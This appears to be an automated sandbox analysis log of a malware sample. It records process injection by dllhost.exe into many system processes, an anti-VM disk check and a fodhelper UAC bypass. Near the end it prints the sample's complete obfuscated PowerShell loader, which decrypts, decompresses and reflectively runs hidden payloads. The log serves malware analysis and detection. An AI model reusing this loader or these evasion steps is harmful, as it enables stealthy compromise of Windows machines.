Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 1100000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 690000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: F20000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: F30000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: BB0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 1010000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 13F0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 600000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: E80000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 540000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: D90000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: C10000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 1450000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: D60000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: C10000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 1100000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: C70000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: B00000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 7B0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 11B0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 720000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 740000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: D00000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 1350000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 9C0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 11D0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 700000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 840000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 1190000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 960000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 9F0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 500000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: BE0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: E30000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 13C0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: CA0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 1460000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 750000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 6C0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 1130000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: A10000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 7C0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 1250000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 1170000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: C20000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 7D0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 9D0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 510000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 620000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: C40000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 590000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 510000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 1C0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: CF0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: F60000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 7E0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 13B0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 13F0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: E40000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 3C0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 700000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 1150000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: DF0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 1050000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: BC0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 1420000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 9A0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: DC0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 9D0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: E00000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 1230000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: CF0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 590000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 1090000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: ED0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: CA0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 3B0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 1040000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: AD0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: BD0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 700000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 730000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 1220000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 9F0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: FA0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 1330000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 780000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 280C22F0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1E1FB970000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\cmd.exe base: 25EE91B0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 1AD31C90000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 226AD1B0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 138D43C0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 236C6DC0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\explorer.exe base: CD0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\cmd.exe base: 15829E70000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 1D643A60000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1CDEB370000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 22F41AD0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 20631820000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 19C5BA20000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1DE98F00000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 1CCE3640000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 1858EA10000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 228C25A0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 2942EBE0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\cmd.exe base: 23D96450000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 1C8A0380000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\cmd.exe base: 26D9F390000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 1E5EF030000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\cmd.exe base: 248D2920000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 21C0EE50000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\wbem\WMIADAP.exe base: 1E43B8A0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\wbem\WMIADAP.exe base: 1E43BA00000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\cmd.exe base: 165EDA50000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 201B5250000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 201B5250000
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\e7WMhx18XN.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\b.bat" " Jump to behavior
Source: C:\Users\user\Desktop\e7WMhx18XN.exe Process created: C:\Users\user\AppData\Local\Temp\paint.exe "C:\Users\user\AppData\Local\Temp\paint.exe" Jump to behavior
Source: C:\Users\user\Desktop\e7WMhx18XN.exe Process created: C:\Users\user\AppData\Local\Temp\FodhelperBypassUAC.exe "C:\Users\user\AppData\Local\Temp\FodhelperBypassUAC.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /i /c:"WDS100T2B0A" /c:"DADY HARDDISK" /c:"QEMU HARDDISK" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c echo function elgju($CRcTF){ $KmeGB=[System.Security.Cryptography.Aes]::Create(); $KmeGB.Mode=[System.Security.Cryptography.CipherMode]::CBC; $KmeGB.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $KmeGB.Key=[System.Convert]::FromBase64String('yXhq0Zci7Ki7oYmTRrbYbju3J/i3HBqGk5Zcg1aE0Uo='); $KmeGB.IV=[System.Convert]::FromBase64String('WdcPQiNwNN818it8sRh8xg=='); $TgPAd=$KmeGB.CreateDecryptor(); $dQIvJ=$TgPAd.TransformFinalBlock($CRcTF, 0, $CRcTF.Length); $TgPAd.Dispose(); $KmeGB.Dispose(); $dQIvJ;}function VIxdo($CRcTF){ Invoke-Expression '$VBZuZ=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$CRcTF);'.Replace('blck', ''); Invoke-Expression '$sdANW=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$IHCXJ=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($VBZuZ, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $IHCXJ.CopyTo($sdANW); $IHCXJ.Dispose(); $VBZuZ.Dispose(); $sdANW.Dispose(); $sdANW.ToArray();}function gYUmc($CRcTF,$tscxF){ Invoke-Expression '$jaygU=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$CRcTF);'.Replace('blck', ''); Invoke-Expression '$aZTCr=$jaygU.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$aZTCr.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $tscxF)blck;'.Replace('blck', '');}$DuTVY = 'C:\Users\user\AppData\Local\Temp\b.bat';$host.UI.RawUI.WindowTitle = $DuTVY;$FQcuc=[System.IO.File]::ReadAllText($DuTVY).Split([Environment]::NewLine);foreach ($BcNGU in $FQcuc) { if ($BcNGU.StartsWith(':: ')) { $sDcLn=$BcNGU.Substring(3); break; }}$fKndv=[string[]]$sDcLn.Split('\');Invoke-Expression '$pcpOF=VIxdo (elgju (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($fKndv[0])));'.Replace('blck', '');Invoke-Expression '$TAQWK=VIxdo (elgju (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($fKndv[1])));'.Replace('blck', '');gYUmc $pcpOF (,[string[]] (''));gYUmc $TAQWK (,[string[]] ('')); Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\paint.exe Process created: C:\Windows\System32\conhost.exe "C:\Windows\System32\conhost.exe" "C:\Users\user\AppData\Local\Temp\paint.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\fodhelper.exe C:\Windows\System32\fodhelper.exe Jump to behavior
Source: C:\Windows\System32\fodhelper.exe Process created: C:\Windows\System32\cmd.exe "cmd.exe" Jump to behavior
